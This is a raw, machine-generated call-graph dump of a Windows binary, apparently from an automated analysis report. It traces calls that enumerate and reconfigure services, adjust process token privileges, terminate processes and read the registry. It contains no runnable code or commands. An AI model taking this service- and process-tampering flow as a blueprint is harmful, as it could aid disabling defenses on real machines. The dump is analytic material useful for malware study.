22260 404cdc 14 API calls 22257->22260 22258 43a906 22262 438b0c 20 API calls 22258->22262 22259 43a884 22259->22258 22263 40e50c 15 API calls 22259->22263 22261 43a857 22260->22261 22264 4042f8 14 API calls 22261->22264 22265 43a912 22262->22265 22270 43a8a0 22263->22270 22266 43a85c 22264->22266 22267 43a959 22265->22267 22272 43a91d GetLastError 22265->22272 23127 40632c 10 API calls 22266->23127 22269 439408 71 API calls 22267->22269 22271 43a968 22269->22271 22270->22258 22277 407450 15 API calls 22270->22277 22273 406bf0 15 API calls 22271->22273 22274 407450 15 API calls 22272->22274 22275 43a975 22273->22275 22276 43a939 22274->22276 22278 438860 17 API calls 22275->22278 22279 407dec 14 API calls 22276->22279 22280 43a8c7 22277->22280 22281 43a97c 22278->22281 22282 43a93e 22279->22282 22284 404cdc 14 API calls 22280->22284 22285 40e50c 15 API calls 22281->22285 22283 407450 15 API calls 22282->22283 22286 43a948 22283->22286 22287 43a8cc 22284->22287 22293 43a989 22285->22293 22288 404cdc 14 API calls 22286->22288 22289 4042f8 14 API calls 22287->22289 22290 43a94d 22288->22290 22291 43a8d1 22289->22291 22294 4042f8 14 API calls 22290->22294 22295 407450 15 API calls 22291->22295 22292 43aa10 22301 40e50c 15 API calls 22292->22301 22293->22292 22296 40e50c 15 API calls 22293->22296 22297 43a952 22294->22297 22298 43a8e0 22295->22298 22305 43a9a7 22296->22305 23129 40632c 10 API calls 22297->23129 22300 407450 15 API calls 22298->22300 22302 43a8e8 22300->22302 22307 43aa24 22301->22307 22303 407450 15 API calls 22302->22303 22304 43a8f2 22303->22304 22306 404cdc 14 API calls 22304->22306 22305->22292 22310 407450 15 API calls 22305->22310 22308 43a8f7 22306->22308 22307->21843 22309 4042f8 14 API calls 22308->22309 22311 43a8fc 22309->22311 22312 43a9ce 22310->22312 23128 40632c 10 API calls 22311->23128 22314 404cdc 14 API calls 22312->22314 22315 43a9d3 22314->22315 22316 4042f8 14 API calls 22315->22316 22317 43a9d8 22316->22317 22318 407450 15 API calls 22317->22318 22319 43a9e7 22318->22319 22320 407450 15 API calls 22319->22320 22321 43a9f2 22320->22321 22322 407450 15 API calls 22321->22322 22323 43a9fc 22322->22323 22324 404cdc 14 API calls 22323->22324 22325 43aa01 22324->22325 22326 4042f8 14 API calls 22325->22326 22327 43aa06 22326->22327 23130 40632c 10 API calls 22327->23130 22330 43a6bf 22329->22330 22331 43a69e 22329->22331 22330->22084 23172 40aa94 17 API calls 22331->23172 22333 43a6a9 22333->22330 23173 43c45c 22334->23173 22336 43deae 23183 43dc64 22336->23183 22341 407450 15 API calls 22342 43df08 22341->22342 22343 407450 15 API calls 22342->22343 22344 43df10 22343->22344 22345 404cdc 14 API calls 22344->22345 22346 43df15 22345->22346 22347 4042f8 14 API calls 22346->22347 22348 43df1a 22347->22348 22349 43dfaa 22348->22349 22350 43df2b 22348->22350 22351 43dfb7 22349->22351 22367 43e004 22349->22367 22353 43df7f 22350->22353 22355 407450 15 API calls 22350->22355 22354 43dfd9 22351->22354 22356 407450 15 API calls 22351->22356 22352 43e060 22357 43cea4 73 API calls 22352->22357 22359 407450 15 API calls 22353->22359 22365 43dfa5 22353->22365 22363 407450 15 API calls 22354->22363 22354->22365 22358 43df43 22355->22358 22360 43dfcf 22356->22360 22361 43e07c 22357->22361 22362 404cdc 14 API calls 22358->22362 22364 43df9b 22359->22364 22366 404cdc 14 API calls 22360->22366 23193 407184 15 API calls 22361->23193 22369 43df48 22362->22369 22370 43dff5 22363->22370 22371 404cdc 14 API calls 22364->22371 22365->22089 22372 43dfd4 22366->22372 22367->22352 22373 407450 15 API calls 22367->22373 22374 4042f8 14 API calls 22369->22374 22375 404cdc 14 API calls 22370->22375 22376 43dfa0 22371->22376 22377 4042f8 14 API calls 22372->22377 22378 43e03d 22373->22378 22379 43df4d 22374->22379 22380 43dffa 22375->22380 22381 4042f8 14 API calls 22376->22381 22377->22354 22382 404cdc 14 API calls 22378->22382 22383 407450 15 API calls 22379->22383 22384 4042f8 14 API calls 22380->22384 22381->22365 22385 43e042 22382->22385 22387 43df5c 22383->22387 22384->22365 22388 4042f8 14 API calls 22385->22388 22391 404cdc 14 API calls 22387->22391 22393 43e047 22388->22393 22396 43df61 22391->22396 22399 407450 15 API calls 22393->22399 22400 4042f8 14 API calls 22396->22400 22405 43e056 22399->22405 22401 43df66 22400->22401 22406 407450 15 API calls 22401->22406 22410 404cdc 14 API calls 22405->22410 22411 43df75 22406->22411 22415 43e05b 22410->22415 22416 404cdc 14 API calls 22411->22416 22420 4042f8 14 API calls 22415->22420 22421 43df7a 22416->22421 22420->22352 22425 4042f8 14 API calls 22421->22425 22425->22353 22438 43b7dc 22433->22438 22434 43b7f8 OpenSCManagerW 22435 43b80c GetLastError 22434->22435 22434->22438 22437 407450 15 API calls 22435->22437 22437->22438 22438->22434 22439 404cdc 14 API calls 22438->22439 22440 43b893 EnumServicesStatusExW 22438->22440 22442 43b99e CloseServiceHandle 22438->22442 22446 407dec 14 API calls 22438->22446 22447 43ba9f 22438->22447 22448 407450 15 API calls 22438->22448 22455 43b58c 27 API calls 22438->22455 22458 40e50c 15 API calls 22438->22458 22461 4042f8 14 API calls 22438->22461 22463 40632c 10 API calls 22438->22463 22465 4072a4 15 API calls 22438->22465 23217 408334 22438->23217 23220 43b1a8 22438->23220 22439->22438 22441 43b8af GetLastError 22440->22441 22440->22442 22443 43b8be CloseServiceHandle 22441->22443 22450 43b8fe 22441->22450 22442->22438 22445 407450 15 API calls 22443->22445 22444 408334 20 API calls 22444->22450 22445->22438 22446->22438 22449 407450 15 API calls 22447->22449 22448->22438 22452 43bab7 22449->22452 22450->22444 22454 43b944 EnumServicesStatusExW 22450->22454 22453 407dec 14 API calls 22452->22453 22456 43babc 22453->22456 22454->22442 22457 43b95c CloseServiceHandle GetLastError 22454->22457 22455->22438 22459 407450 15 API calls 22456->22459 22462 407450 15 API calls 22457->22462 22458->22438 22460 43bac6 22459->22460 22464 404cdc 14 API calls 22460->22464 22461->22438 22475 43b97e 22462->22475 22463->22438 22466 43bacb 22464->22466 22465->22438 22468 4042f8 14 API calls 22466->22468 22467 407dec 14 API calls 22467->22475 22469 43bad0 22468->22469 22471 408334 20 API calls 22469->22471 22470 407450 15 API calls 22470->22475 22496 43bae7 22471->22496 22472 404cdc 14 API calls 22472->22475 22473 4042f8 14 API calls 22473->22475 22474 43bb80 22476 406bf0 15 API calls 22474->22476 22475->22467 22475->22470 22475->22472 22475->22473 23274 40632c 10 API calls 22475->23274 22488 43bb8c 22476->22488 22478 43bbe4 22479 43bc13 22478->22479 22480 43bbed 22478->22480 22482 407450 15 API calls 22479->22482 22483 407450 15 API calls 22480->22483 22481 4072a4 15 API calls 22481->22496 22485 43bc22 22482->22485 22487 43bbfc 22483->22487 22484 406bf0 15 API calls 22484->22488 22489 404cdc 14 API calls 22485->22489 22490 407450 15 API calls 22487->22490 22488->22478 22488->22484 23275 407184 15 API calls 22488->23275 22491 43bc27 22489->22491 22492 43bc07 22490->22492 22494 4042f8 14 API calls 22491->22494 22495 404cdc 14 API calls 22492->22495 22493 408334 20 API calls 22493->22496 22499 43bc11 22494->22499 22497 43bc0c 22495->22497 22496->22474 22496->22481 22496->22493 22498 4042f8 14 API calls 22497->22498 22498->22499 23268 408340 22499->23268 22503 43d100 22502->22503 22503->22503 22504 43c45c 17 API calls 22503->22504 22505 43d124 22504->22505 23331 40f9d8 22505->23331 22510 43c45c 17 API calls 22514 43d14c 22510->22514 22511 43d2c1 22513 43d36a 22511->22513 22516 404564 17 API calls 22511->22516 22512 43d208 22515 407450 15 API calls 22512->22515 22518 406c44 14 API calls 22513->22518 22517 40f9d8 15 API calls 22514->22517 22519 43d217 22515->22519 22521 43d2d8 22516->22521 22522 43d157 22517->22522 22523 43d3af 22518->22523 22520 404cdc 14 API calls 22519->22520 22525 43d21c 22520->22525 22526 40f9d8 15 API calls 22521->22526 23340 40f7e8 22522->23340 22524 406c44 14 API calls 22523->22524 22528 43d3b9 22524->22528 22529 4042f8 14 API calls 22525->22529 22530 43d2e3 22526->22530 22532 43d3d1 22528->22532 22533 43d3c4 22528->22533 22534 43d221 22529->22534 23364 4070a0 22530->23364 22531 43d15f 22536 43d163 22531->22536 22537 43d1a0 22531->22537 22538 43c45c 17 API calls 22532->22538 22542 43c45c 17 API calls 22533->22542 22606 43d3cc 22533->22606 23414 43cf60 21 API calls 22534->23414 22541 43c45c 17 API calls 22536->22541 22539 407450 15 API calls 22537->22539 22543 43d3de 22538->22543 22544 43d1af 22539->22544 22540 43d2f3 23385 40f77c 22540->23385 22546 43d170 22541->22546 22549 43d465 22542->22549 22550 43cc44 81 API calls 22543->22550 22551 404cdc 14 API calls 22544->22551 22553 40f9d8 15 API calls 22546->22553 22547 43d50c 22554 43d543 22547->22554 22563 43c45c 17 API calls 22547->22563 22557 43cc44 81 API calls 22549->22557 22558 43d3eb 22550->22558 22559 43d1b4 22551->22559 22552 43d2fb 22560 43d373 22552->22560 22593 43d2ff 22552->22593 22561 43d17b 22553->22561 22554->22127 22555 43c45c 17 API calls 22565 43d4e8 22555->22565 22556 43d237 22566 43d23b 22556->22566 22567 43d29a 22556->22567 22568 43d472 22557->22568 22569 43d40c 22558->22569 22585 406c44 14 API calls 22558->22585 22570 4042f8 14 API calls 22559->22570 22564 43c45c 17 API calls 22560->22564 22562 407450 15 API calls 22561->22562 22571 43d18e 22562->22571 22572 43d51f 22563->22572 22573 43d380 22564->22573 22574 40f77c 4 API calls 22565->22574 22590 43c45c 17 API calls 22566->22590 22576 407450 15 API calls 22567->22576 22575 43d493 22568->22575 22591 406c44 14 API calls 22568->22591 22577 43d42d 22569->22577 22595 406c44 14 API calls 22569->22595 22578 43d1b9 22570->22578 22579 407450 15 API calls 22571->22579 22580 40f77c 4 API calls 22572->22580 22581 40f9d8 15 API calls 22573->22581 22584 43d4f0 22574->22584 22582 43d4b4 22575->22582 22600 406c44 14 API calls 22575->22600 22586 43d2a9 22576->22586 22596 406c44 14 API calls 22577->22596 22577->22606 22583 43c45c 17 API calls 22578->22583 22587 43d194 22579->22587 22588 43d527 22580->22588 22589 43d38b 22581->22589 22582->22606 22612 406c44 14 API calls 22582->22612 22592 43d1c6 22583->22592 22584->22547 22603 43c45c 17 API calls 22584->22603 22585->22569 22594 404cdc 14 API calls 22586->22594 22597 404cdc 14 API calls 22587->22597 22588->22554 22608 43c45c 17 API calls 22588->22608 22598 406fe0 15 API calls 22589->22598 22599 43d252 22590->22599 22591->22575 22601 40f9d8 15 API calls 22592->22601 22602 43c45c 17 API calls 22593->22602 22604 43d2ae 22594->22604 22595->22577 22596->22606 22607 43d199 22597->22607 22609 43d398 22598->22609 22610 40f9d8 15 API calls 22599->22610 22600->22582 22611 43d1d1 22601->22611 22613 43d324 22602->22613 22614 43d501 22603->22614 22605 4042f8 14 API calls 22604->22605 22615 43d298 22605->22615 22606->22547 22606->22555 22616 4042f8 14 API calls 22607->22616 22617 43d538 22608->22617 23395 43cc44 22609->23395 22619 43d25d 22610->22619 22620 407450 15 API calls 22611->22620 22612->22606 22621 40f9d8 15 API calls 22613->22621 22622 43cc44 81 API calls 22614->22622 22615->22511 22623 43d19e 22616->22623 22624 43cc44 81 API calls 22617->22624 22625 4070a0 15 API calls 22619->22625 22626 43d1e4 22620->22626 22627 43d32f 22621->22627 22622->22547 22623->22511 22623->22512 22624->22554 22628 43d26d 22625->22628 22629 407450 15 API calls 22626->22629 22630 4070a0 15 API calls 22627->22630 22634 407450 15 API calls 22628->22634 22631 43d1ea 22629->22631 22632 43d33f 22630->22632 22633 404cdc 14 API calls 22631->22633 22638 407450 15 API calls 22632->22638 22635 43d1ef 22633->22635 22636 43d286 22634->22636 22637 4042f8 14 API calls 22635->22637 22639 407450 15 API calls 22636->22639 22640 43d1f4 22637->22640 22641 43d358 22638->22641 22642 43d28e 22639->22642 23413 40632c 10 API calls 22640->23413 22644 407450 15 API calls 22641->22644 22645 404cdc 14 API calls 22642->22645 22646 43d360 22644->22646 22647 43d293 22645->22647 22648 404cdc 14 API calls 22646->22648 22650 4042f8 14 API calls 22647->22650 22649 43d365 22648->22649 22651 4042f8 14 API calls 22649->22651 22650->22615 22651->22513 22653 43c5d1 22652->22653 22654 43c5bb 22652->22654 23549 4387a8 18 API calls 22653->23549 23548 4387ec 18 API calls 22654->23548 22657 43c5cc 22658 438890 18 API calls 22657->22658 22659 43c5ed 22658->22659 23526 4389d8 22659->23526 22661 43c5fc 22662 43c600 GetLastError 22661->22662 22663 43c63c 22661->22663 22664 407450 15 API calls 22662->22664 23542 43937c 22663->23542 22666 43c61c 22664->22666 22667 407dec 14 API calls 22666->22667 22669 43c621 22667->22669 22668 43c6b4 22672 438860 17 API calls 22668->22672 22671 407450 15 API calls 22669->22671 22670 43c65d 22670->22668 22673 43c45c 17 API calls 22670->22673 22674 43c62b 22671->22674 22681 43c6f3 22672->22681 22675 43c68c 22673->22675 22676 404cdc 14 API calls 22674->22676 23551 407184 15 API calls 22675->23551 22678 43c630 22676->22678 22680 4042f8 14 API calls 22678->22680 22683 43c635 22680->22683 22681->22135 23550 40632c 10 API calls 22683->23550 23566 43ae28 22685->23566 22687 43e7e6 22688 43e7fa 22687->22688 22689 43b1a8 26 API calls 22687->22689 22690 43ae28 27 API calls 22688->22690 22689->22688 22691 43e804 22690->22691 22692 43e818 22691->22692 22693 43b1a8 26 API calls 22691->22693 22692->22144 22693->22692 22695 406bd8 22694->22695 22696 43bf27 GetCurrentProcess OpenProcessToken 22695->22696 22697 43bf97 22696->22697 22698 43bf4c GetLastError 22696->22698 22701 43bfa3 LookupPrivilegeValueW 22697->22701 23629 40f220 15 API calls 22698->23629 22700 43bf66 23630 407184 15 API calls 22700->23630 22703 43bffa AdjustTokenPrivileges 22701->22703 22704 43bfaf GetLastError 22701->22704 22707 43c031 GetLastError 22703->22707 22716 43bf92 22703->22716 23631 40f220 15 API calls 22704->23631 23633 40f220 15 API calls 22707->23633 22708 43bfc9 23632 407184 15 API calls 22708->23632 22713 43c04b 23634 407184 15 API calls 22713->23634 22716->22151 22732 43c216 TerminateProcess 22731->22732 22733 43c1da GetLastError 22731->22733 22734 43c222 CloseHandle GetLastError 22732->22734 22735 43c264 CloseHandle 22732->22735 22736 407450 15 API calls 22733->22736 22737 407450 15 API calls 22734->22737 22735->22153 22738 43c1f6 22736->22738 22739 43c244 22737->22739 22740 407dec 14 API calls 22738->22740 22741 407dec 14 API calls 22739->22741 22742 43c1fb 22740->22742 22744 43c249 22741->22744 22743 407450 15 API calls 22742->22743 22745 43c205 22743->22745 22746 407450 15 API calls 22744->22746 22747 404cdc 14 API calls 22745->22747 22748 43c253 22746->22748 22749 43c20a 22747->22749 22750 404cdc 14 API calls 22748->22750 22752 4042f8 14 API calls 22749->22752 22751 43c258 22750->22751 22753 4042f8 14 API calls 22751->22753 22754 43c20f 22752->22754 22755 43c25d 22753->22755 23635 40632c 10 API calls 22754->23635 23636 40632c 10 API calls 22755->23636 22759 43b59e 22758->22759 22760 407450 15 API calls 22759->22760 22761 43b5c5 22760->22761 22762 407450 15 API calls 22761->22762 22763 43b5cd 22762->22763 22764 407450 15 API calls 22763->22764 22765 43b5d7 22764->22765 22766 404cdc 14 API calls 22765->22766 22767 43b5dc 22766->22767 22768 4042f8 14 API calls 22767->22768 22769 43b5e1 OpenSCManagerW 22768->22769 22770 43b610 22769->22770 22771 43b5f8 GetLastError 22769->22771 22773 43b61a OpenServiceW 22770->22773 23637 43b48c 17 API calls 22771->23637 22774 43b642 StartServiceW 22773->22774 22775 43b62d GetLastError 22773->22775 22777 43b6a6 CloseServiceHandle CloseServiceHandle 22774->22777 22778 43b65a GetLastError 22774->22778 23638 43b48c 17 API calls 22775->23638 22779 43b60a 22777->22779 22780 43b696 22778->22780 22781 43b669 Sleep StartServiceW 22778->22781 22779->22156 23640 43b48c 17 API calls 22780->23640 22781->22777 22782 43b686 22781->22782 23639 43b48c 17 API calls 22782->23639 22784 43b63f 22784->22779 22787 43e879 22786->22787 22788 43e88f 22786->22788 23649 4387ec 18 API calls 22787->23649 23650 4387a8 18 API calls 22788->23650 22791 43e88a 22792 438890 18 API calls 22791->22792 22793 43e8ab 22792->22793 22794 4389d8 19 API calls 22793->22794 22795 43e8ba 22794->22795 22796 43e8fa 22795->22796 22797 43e8be GetLastError 22795->22797 23641 4396b8 22796->23641 22799 407450 15 API calls 22797->22799 22801 43e8da 22799->22801 22802 407dec 14 API calls 22801->22802 22804 43e8df 22802->22804 22803 438860 17 API calls 22805 43e95b 22803->22805 22806 407450 15 API calls 22804->22806 22808 43ed53 22805->22808 22809 4389d8 19 API calls 22805->22809 22807 43e8e9 22806->22807 22810 404cdc 14 API calls 22807->22810 22808->22166 22811 43e974 22809->22811 22812 43e8ee 22810->22812 22813 43e9b4 22811->22813 22814 43e978 GetLastError 22811->22814 22815 4042f8 14 API calls 22812->22815 22816 4396b8 70 API calls 22813->22816 22817 407450 15 API calls 22814->22817 22818 43e8f3 22815->22818 22819 43e9d1 22816->22819 22820 43e994 22817->22820 23651 40632c 10 API calls 22818->23651 22823 438860 17 API calls 22819->22823 22822 407dec 14 API calls 22820->22822 22824 43e999 22822->22824 22825 43ea10 22823->22825 22826 407450 15 API calls 22824->22826 22827 4389d8 19 API calls 22825->22827 22828 43e9a3 22826->22828 22830 43ea1f 22827->22830 22829 404cdc 14 API calls 22828->22829 22831 43e9a8 22829->22831 22832 43ea23 GetLastError 22830->22832 22833 43ea5f 22830->22833 22834 4042f8 14 API calls 22831->22834 22836 407450 15 API calls 22832->22836 22835 4396b8 70 API calls 22833->22835 22837 43e9ad 22834->22837 22838 43ea7c 22835->22838 22839 43ea3f 22836->22839 23652 40632c 10 API calls 22837->23652 22843 438860 17 API calls 22838->22843 22840 407dec 14 API calls 22839->22840 22842 43ea44 22840->22842 22844 407450 15 API calls 22842->22844 22845 43eabb 22843->22845 22846 43ea4e 22844->22846 23644 439d1c 22845->23644 22849 404cdc 14 API calls 22846->22849 22850 43ea53 22849->22850 22852 4042f8 14 API calls 22850->22852 22851 4389d8 19 API calls 22853 43eadf 22851->22853 22854 43ea58 22852->22854 22855 43eae3 GetLastError 22853->22855 22856 43eb1f 22853->22856 23653 40632c 10 API calls 22854->23653 22859 407450 15 API calls 22855->22859 22932 43f314 22931->22932 22933 43f31f 22931->22933 23673 43c31c 22932->23673 22935 43c31c 21 API calls 22933->22935 22937 43f329 22935->22937 22936 43f31e 22936->22174 22937->22174 22939 43cebb 22938->22939 22940 42f9fc 73 API calls 22939->22940 22941 43cee1 22940->22941 22941->21811 22942->21872 22943->21867 22944->21892 22945->21986 22946->22073 22947->22085 22948->21918 22949->21912 22951 405fd0 22950->22951 22954 405f2c 22951->22954 22955 405f74 22954->22955 22956 405f3c 22954->22956 22955->22187 22956->22955 22958 4430dc 22956->22958 22959 4430f6 22958->22959 22960 44314c 22958->22960 22974 406098 22959->22974 22960->22956 22962 443122 22980 409610 22962->22980 22963 443100 22963->22962 22964 406bf0 15 API calls 22963->22964 22964->22962 22968 443136 22985 415b40 GetModuleHandleW 22968->22985 22971 408f6c 37 API calls 22972 443147 22971->22972 22990 415198 82 API calls 22972->22990 22976 4060a4 22974->22976 22979 4060d5 22976->22979 22991 405fe0 69 API calls 22976->22991 22992 406034 69 API calls 22976->22992 22993 406084 69 API calls 22976->22993 22979->22963 22981 4041b0 14 API calls 22980->22981 22982 40961d 22981->22982 22983 414698 GetVersionExW 22982->22983 22984 4146af 22983->22984 22984->22968 22986 415b61 22985->22986 22987 415b51 22985->22987 22986->22971 22994 40aa94 17 API calls 22987->22994 22989 415b5c 22989->22986 22990->22960 22991->22976 22992->22976 22993->22976 22994->22989 22996 406847 22995->22996 23006 404c3c 22996->23006 22998 406852 23018 4067c8 22998->23018 23001 406344 14 API calls 23002 406884 23001->23002 23003 4068c4 23002->23003 23004 4068d8 23003->23004 23005 4068ca SysFreeString 23003->23005 23004->22193 23005->23004 23007 404c3e 23006->23007 23010 404be8 23007->23010 23014 404c69 23007->23014 23028 404be8 23007->23028 23035 40a264 14 API calls 23007->23035 23008 404cb4 23008->22998 23010->23008 23015 404bfc 23010->23015 23026 404ba4 14 API calls 23010->23026 23012 404c33 23012->22998 23014->22998 23015->23012 23027 404318 14 API calls 23015->23027 23017 404c2e 23017->22998 23019 4067d4 23018->23019 23020 404c3c 14 API calls 23019->23020 23021 4067df 23020->23021 23022 404be8 14 API calls 23021->23022 23023 406816 23022->23023 23024 406344 14 API calls 23023->23024 23025 40681f 23024->23025 23025->23001 23026->23015 23027->23017 23029 404bf4 23028->23029 23032 404bfc 23028->23032 23036 404ba4 14 API calls 23029->23036 23031 404c33 23031->23007 23032->23031 23037 404318 14 API calls 23032->23037 23034 404c2e 23034->23007 23035->23007 23036->23032 23037->23034 23041 4048dc 23038->23041 23042 4048e8 23041->23042 23043 40491d 23042->23043 23045 404318 14 API calls 23042->23045 23043->22201 23045->23043 23046->22205 23047->22208 23048->22204 23051 404450 23049->23051 23050 406f48 15 API calls 23052 4044b7 23050->23052 23051->23050 23052->22212 23054 407504 14 API calls 23053->23054 23055 406d3c 23054->23055 23056 406344 14 API calls 23055->23056 23057 40459a 23056->23057 23057->22222 23058->22227 23059->22232 23061 4388b7 23060->23061 23062 43889d 23060->23062 23066 438b0c 23061->23066 23063 4388a3 RegCloseKey 23062->23063 23064 4388ad 23062->23064 23063->23064 23065 438860 17 API calls 23064->23065 23065->23061 23067 438b36 23066->23067 23135 406c44 23066->23135 23131 43858c 23067->23131 23070 438b3e 23072 438b56 23070->23072 23139 4073dc 15 API calls 23070->23139 23073 438b84 RegOpenKeyExW 23072->23073 23074 438b93 23073->23074 23075 438b9c 23074->23075 23079 438bda 23074->23079 23076 438bc8 23075->23076 23140 407184 15 API calls 23075->23140 23141 4388bc 17 API calls 23076->23141 23080 438bfa RegOpenKeyExW 23079->23080 23081 438c09 23080->23081 23083 438c12 23081->23083 23087 438c4d 23081->23087 23082 438bd5 23082->22244 23084 438c3e 23083->23084 23142 407184 15 API calls 23083->23142 23143 4388bc 17 API calls 23084->23143 23088 438c6b RegOpenKeyExW 23087->23088 23089 438c7a 23088->23089 23089->23082 23090 438cac 23089->23090 23144 407184 15 API calls 23089->23144 23090->23082 23145 4388bc 17 API calls 23090->23145 23148 4392a0 23093->23148 23096 439422 23099 406d2c 14 API calls 23096->23099 23097 439478 23098 406bf0 15 API calls 23097->23098 23107 43946d 23098->23107 23100 439434 23099->23100 23151 4398f0 23100->23151 23102 43944c 23103 43946f 23102->23103 23105 439458 23102->23105 23159 438560 69 API calls 23103->23159 23106 406f48 15 API calls 23105->23106 23106->23107 23108 438860 23107->23108 23109 43886a 23108->23109 23110 43888e 23108->23110 23111 438870 RegFlushKey 23109->23111 23112 438876 RegCloseKey 23109->23112 23114 40e50c 23110->23114 23111->23112 23113 406bf0 15 API calls 23112->23113 23113->23110 23115 40e518 23114->23115 23116 40e53b 23115->23116 23117 40e52c 23115->23117 23119 406f48 15 API calls 23116->23119 23166 40e4bc 15 API calls 23117->23166 23120 40e539 23119->23120 23120->22259 23121->22240 23122->22240 23124 407dc4 23123->23124 23167 404cb8 23124->23167 23127->22245 23128->22258 23129->22267 23130->22292 23132 43859c 23131->23132 23133 4385cd 23132->23133 23146 4064f4 15 API calls 23132->23146 23133->23070 23137 406c48 23135->23137 23136 406c78 23136->23067 23137->23136 23147 4041cc 14 API calls 23137->23147 23139->23072 23141->23082 23143->23082 23145->23082 23146->23133 23147->23136 23160 43924c 23148->23160 23150 4392b4 23150->23096 23150->23097 23152 406c7c 23151->23152 23153 439916 RegQueryValueExW 23152->23153 23155 439929 23153->23155 23154 439951 23154->23102 23155->23154 23164 413794 69 API calls 23155->23164 23157 43994c 23165 405c30 14 API calls 23157->23165 23159->23107 23161 439264 23160->23161 23162 439278 RegQueryValueExW 23161->23162 23163 43928b 23162->23163 23163->23150 23164->23157 23166->23120 23168 404c3c 14 API calls 23167->23168 23169 404ccc 23168->23169 23170 404be8 14 API calls 23169->23170 23171 404cd9 23170->23171 23171->22256 23172->22333 23174 43c47b 23173->23174 23175 406bf0 15 API calls 23174->23175 23176 43c492 23175->23176 23177 43c4dc 23176->23177 23194 415584 16 API calls 23176->23194 23180 43c4f0 ExpandEnvironmentStringsW 23177->23180 23179 43c4ce 23181 406c44 14 API calls 23179->23181 23182 43c4fa 23180->23182 23181->23177 23182->22336 23184 406c7c 23183->23184 23185 43dc79 LoadLibraryExW 23184->23185 23186 43dc85 FindResourceW 23185->23186 23187 43dcfc 23185->23187 23186->23187 23188 43dc95 LoadResource 23186->23188 23190 40fed8 23187->23190 23188->23187 23189 43dca0 FreeLibrary 23188->23189 23189->23187 23195 40feec 23190->23195 23192 40fee7 23192->22341 23194->23179 23196 40fef5 23195->23196 23197 40ff49 23196->23197 23213 4064f4 15 API calls 23196->23213 23199 40ffa0 23197->23199 23200 40ff59 23197->23200 23203 40ff76 23199->23203 23215 4064f4 15 API calls 23199->23215 23200->23203 23214 4064f4 15 API calls 23200->23214 23204 41004b 23203->23204 23211 40ffd3 23203->23211 23205 406d2c 14 API calls 23204->23205 23209 410049 23205->23209 23206 41003e 23207 406f48 15 API calls 23206->23207 23207->23209 23208 406bf0 15 API calls 23208->23211 23209->23192 23210 406f48 15 API calls 23210->23211 23211->23206 23211->23208 23211->23210 23216 4064f4 15 API calls 23211->23216 23213->23197 23214->23203 23215->23203 23216->23211 23276 40819c 23217->23276 23221 43b1bc 23220->23221 23222 407450 15 API calls 23221->23222 23223 43b1d9 23222->23223 23224 407450 15 API calls 23223->23224 23225 43b1e1 23224->23225 23226 407450 15 API calls 23225->23226 23227 43b1eb 23226->23227 23228 404cdc 14 API calls 23227->23228 23229 43b1f0 23228->23229 23230 4042f8 14 API calls 23229->23230 23231 43b1f5 OpenSCManagerW 23230->23231 23232 43b243 23231->23232 23233 43b209 GetLastError 23231->23233 23235 43b24d OpenServiceW 23232->23235 23234 407450 15 API calls 23233->23234 23236 43b225 23234->23236 23237 43b297 ChangeServiceConfigW 23235->23237 23238 43b25a CloseServiceHandle GetLastError 23235->23238 23239 407dec 14 API calls 23236->23239 23240 43b2f7 CloseServiceHandle CloseServiceHandle 23237->23240 23241 43b2b4 CloseServiceHandle CloseServiceHandle GetLastError 23237->23241 23242 407450 15 API calls 23238->23242 23243 43b22a 23239->23243 23245 43b23e 23240->23245 23246 407450 15 API calls 23241->23246 23247 43b27c 23242->23247 23244 407450 15 API calls 23243->23244 23248 43b234 23244->23248 23245->22438 23249 43b2dc 23246->23249 23250 407dec 14 API calls 23247->23250 23251 404cdc 14 API calls 23248->23251 23252 407dec 14 API calls 23249->23252 23253 43b281 23250->23253 23254 43b239 23251->23254 23255 43b2e1 23252->23255 23256 407450 15 API calls 23253->23256 23257 4042f8 14 API calls 23254->23257 23258 407450 15 API calls 23255->23258 23259 43b28b 23256->23259 23257->23245 23261 43b2eb 23258->23261 23260 404cdc 14 API calls 23259->23260 23262 43b290 23260->23262 23263 404cdc 14 API calls 23261->23263 23264 4042f8 14 API calls 23262->23264 23265 43b2f0 23263->23265 23266 43b295 23264->23266 23267 4042f8 14 API calls 23265->23267 23266->23245 23267->23266 23269 408346 23268->23269 23273 408378 23268->23273 23270 408370 23269->23270 23269->23273 23301 40789c 23269->23301 23326 4041cc 14 API calls 23270->23326 23273->22100 23274->22442 23277 4081bb 23276->23277 23281 4081d5 23276->23281 23278 4081c6 23277->23278 23295 4042a0 14 API calls 23277->23295 23296 408194 16 API calls 23278->23296 23283 40821e 23281->23283 23297 4042a0 14 API calls 23281->23297 23282 4081d0 23282->22438 23285 40822f 23283->23285 23298 4042a0 14 API calls 23283->23298 23287 408238 23285->23287 23288 40826d 23285->23288 23299 4041e4 14 API calls 23287->23299 23289 4041b0 14 API calls 23288->23289 23291 408277 23289->23291 23292 408268 23291->23292 23300 40817c 20 API calls 23291->23300 23292->23282 23294 40819c 20 API calls 23292->23294 23294->23292 23295->23278 23296->23282 23297->23283 23298->23285 23299->23292 23300->23292 23302 4078a5 23301->23302 23305 4078e2 23301->23305 23303 4078e7 23302->23303 23304 4078ba 23302->23304 23306 4078f8 23303->23306 23307 4078ee 23303->23307 23304->23305 23308 4078c2 23304->23308 23309 407904 23304->23309 23305->23270 23327 406368 14 API calls 23306->23327 23310 406344 14 API calls 23307->23310 23314 4078c6 23308->23314 23315 407938 23308->23315 23312 407915 23309->23312 23313 40790b 23309->23313 23310->23305 23328 4068dc SysFreeString 23312->23328 23316 4068c4 SysFreeString 23313->23316 23318 407947 23314->23318 23319 4078ca 23314->23319 23315->23305 23329 407884 14 API calls 23315->23329 23316->23305 23318->23305 23322 40789c 16 API calls 23318->23322 23321 407965 23319->23321 23325 4078d2 23319->23325 23321->23305 23330 40784c 16 API calls 23321->23330 23322->23318 23324 408340 16 API calls 23324->23325 23325->23305 23325->23324 23326->23273 23327->23305 23328->23305 23329->23315 23330->23321 23415 40f8fc 23331->23415 23333 40f9eb 23421 40730c 23333->23421 23335 40f9fc 23336 40f7c4 23335->23336 23337 406c7c 23336->23337 23338 40f7ce GetFileAttributesW 23337->23338 23339 40f7d9 23338->23339 23339->22510 23339->22623 23341 40f7fd 23340->23341 23342 40f835 23341->23342 23443 4136c4 69 API calls 23341->23443 23433 414f3c 23342->23433 23346 40f825 23444 405c30 14 API calls 23346->23444 23347 406c44 14 API calls 23349 40f84b 23347->23349 23350 40f868 23349->23350 23445 4064f4 15 API calls 23349->23445 23352 40f876 23350->23352 23353 40f7c4 GetFileAttributesW 23350->23353 23354 40f886 23352->23354 23355 40f9d8 15 API calls 23352->23355 23353->23352 23358 40f9d8 15 API calls 23354->23358 23360 40f8c6 